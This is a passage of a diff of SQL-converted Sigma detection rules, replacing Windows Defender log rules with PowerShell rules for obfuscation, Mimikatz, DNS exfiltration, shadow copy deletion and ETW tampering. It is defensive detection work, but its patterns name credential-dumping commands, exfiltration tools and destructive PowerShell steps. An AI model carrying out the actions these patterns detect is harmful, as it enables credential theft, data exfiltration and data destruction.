of the Microsoft Malware Protection 
Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" 
+ "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", "attack.impact", - "attack.t1499.004" + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" 
], - "filename": "win_audit_cve.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious 
changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": 
"bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and 
\"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - 
"id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "status": "experimental", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use 
Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "status": "experimental", + "description": "Uses PowerShell to install/copy a a file into a system directory such 
as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "status": "experimental", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') 
OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE 
'%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" 